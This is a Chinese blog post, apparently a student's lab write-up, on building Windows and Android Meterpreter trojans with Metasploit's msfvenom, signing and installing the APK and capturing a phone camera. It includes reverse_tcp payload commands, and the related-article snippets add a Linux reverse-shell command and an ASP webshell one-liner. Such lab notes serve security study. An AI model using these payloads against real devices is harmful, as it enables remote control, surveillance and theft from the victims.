使用msf创建木马&使用脚本

最新推荐文章于 2024-10-02 09:00:00 发布
最新推荐文章于 2024-10-02 09:00:00 发布
阅读量4.1k 收藏 37
点赞数 7
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37865996/article/details/85855096
版权

0x01.Msfconsole

Msfconsole提供了一个一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,可以输入help[COMMAND],进一步查看该命令的使用帮助信息。

0x02.Windows木马的生成

Windows木马生成流程如下:

格式为:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe
先查询一下攻击机的IP:

则有下列的输入:

将生成的木马放到目标Win10上去即可。因为只是实验,所以关闭了win10的防火墙和查杀软件,实际情况要复杂得多。

0x03.与Windows主机的“互动”

首先,在攻击机设置控制窗口:

只等目标机click生成的木马软件。

进行一些简单的操作:

0x04.与Windows主机的其他“互动”方式

参考:https://xz.aliyun.com/t/2536

0x04.生成Android木马并操作

生成方式和之前的差不多,见下图:

发给手机后,可进行后续的操作。

借鉴:https://blog.csdn.net/u013990050/article/details/61618443

https://blog.csdn.net/qq_41502923/article/details/79151982

不能拿到安卓设备上去直接安装,我们还需要给apk文件签名
签名的话windwos上可以用apk逆向助手,android killer 。安卓上可以用MT文件管理器签名,都是一键化的。

签名完成后,用数据线将安卓设置和windows相连,在adb push,将木马推送上安卓设备上。

在安卓设置上我们用文件管理器来到sdcard目录下,可以看到apk.apk文件,我们点击安装这个软件,可以看到这个木马声请了很多权限:

设置自己网络ip以及端口,手机点击病毒,即可抓取摄像头:

获得截图后,保存在/root文件夹下

其中webscam_snap -i 1:外置摄像头 2:内置摄像头

0x05.总结

考试周,时间不充裕,导致windows的指令才试了几个,安卓的还没找到愿意做实验的对象(笑了哈哈哈)。继续努力!

东方隐侠-千里
关注
专栏目录
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1645
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
使用msfvenom生成木马
Sylon的博客
08-27 3545
msfvenom Options: -p, --payload < payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,...
MSF(metasploit) 添加脚本
YouthBelief的博客
11-05 2446
kali msf脚本存放目录 /usr/share/metasploit-framework/modules/后边根据脚本而定 VPS msf脚本存放目录 /opt/metasploit-framework/embedded/framework/modules/后边根据脚本而定 (1)把准备好的脚本放入对应的目录下 以cve-2021-41773为例 导入下方vps存放地址脚本即可 /opt/metasploit-framework/embedded/framework/modules/exploits
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
最新发布
分享Python知识
10-02 1751
教你做一个木马病毒(非常详细),零基础入门黑客技术,收藏这一篇就够了!
MSF终端自动化脚本编写使用
sGanYu
09-07 2693
Msfconsole内包含自动化脚本文件,一种可以在终端内按顺序执行的命令列表,该功能大大减少渗透测试所需的时间提高效率,将选择模块、设置参数运行等等任务进行自动化。
【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 1695
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4732
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
MSF使用教程
热门推荐
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
msf安卓手机木马实战要点整理
Vdieoo的博客
04-07 5649
Msf手机木马高级选项设置说明 Androidwakelock 阻止手机休眠以便处理耗时操作 AutoUnhookProcess ? AutoVerifySession 自动验证删除无效会话 AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内 EnableStageEncoding 对第二级有效载荷进行编码 Sessi...
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 821
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5932
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
msfconsole执行脚本
公众号shadow sock7
06-24 2756
2350 2017-03-27 03:16 msfconsole -r php-cgi.msf ➜ exploit cat scan_ms17-010.rb [1:45:21] use auxiliary/scanner/smb
渗透知识-脚本木马的制作原理
Jian Sun_的博客
02-08 812
一、webshell制作原理 1、webshell种类     一句话木马使用的最多)、小马、大马、打包马、脱裤马等等 2、一句话木马     介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色     eg:<%execute request(“value”)%>     解释:     execute:是一个执行函数,用来执行该命令     request:是接收提交方式,可接受post型、get型、cookie型的传参     value:是参数,也是我们用
Metasploit使用msfcli命令行接口编写shell脚本程序
m0_46161993的博客
07-01 1061
问题描述   使用msfcli命令行接口编写一个Shell脚本程序,实现用户只需输入目标Linux靶机IP地址作为参数,就可以使用usermap_script漏洞渗透攻击模块,获得靶机的远程Shell访问。 解决办法   由于2005年时便取消了msfcli,因此使用msfconsole -x来代替msfcli。   先提供脚本内容如下: #!/bin/bash #表示使用Bourne Again Shell的shell类型 echo "Please set remote host(RHOST) IP"
手动编写木马
The code way of kinnisoy
04-29 3万+
使用C++实现一个简单的木马,实现木马的远程控制功能,能够开机自启动和伪装或隐藏,最后通过清除本木马,掌握常规的木马排查和查杀方法。 工具:vc++6.0 攻击机:win10(ip随机) 靶机:192.168.1.129 一、木马是什么? 这是一个老生常谈的问题,木马(Trojan)这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的本意是特洛伊的,即代指特洛伊木马,也就是木马...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1456
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
msfconsole之制作windows木马并成功获取shell
qq_56228347的博客
11-22 3764
msfconsole制作windows木马并上线获取控制权限
二进制安全之木马程序简介
weixin_51339377的博客
03-17 1077
当作(计算机会把不同的程序作为什么类型的文件和不同的方式来进行执行) 文件头的作用: 告诉系统,把下面的二进制代码,当作什么来执行!!!! 操作系统为了方便用户使用使用后缀名这个机制: .exe .dll .jpg .jpeg .png .avi .mp3 .mp4.... 逆向工程工具:C32 协议: 李老师协议: 协议头001100->内容1->结束语1111 001100 xxxxxxxxx xxxx xxxx xxxxx 1111 0101110101
一句话木马该怎么实现?现在就带你了解
kali_Ma的博客
07-30 5694
前言 一直以来,Java一句话木马都是采用打入字节码defineClass实现的。这种方法的优势是可以完整的打进去一个类,可以几乎实现Java上的所有功能。不足之处就是Payload过于巨大,并且不像脚本语言一样方便修改。并且还存在很多特征,例如继承ClassLoader,反射调用defineClass等。本在这里提出一种Java一句话木马:利用Java中JS引擎实现的一句话木马。 基本原理 Java没有eval函数,Js有eval函数,可以把字符串当代码解析。 Java从1.6开始自带ScriptEng
如何使用kali的msf制作木马
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF)制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

东方隐侠-千里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值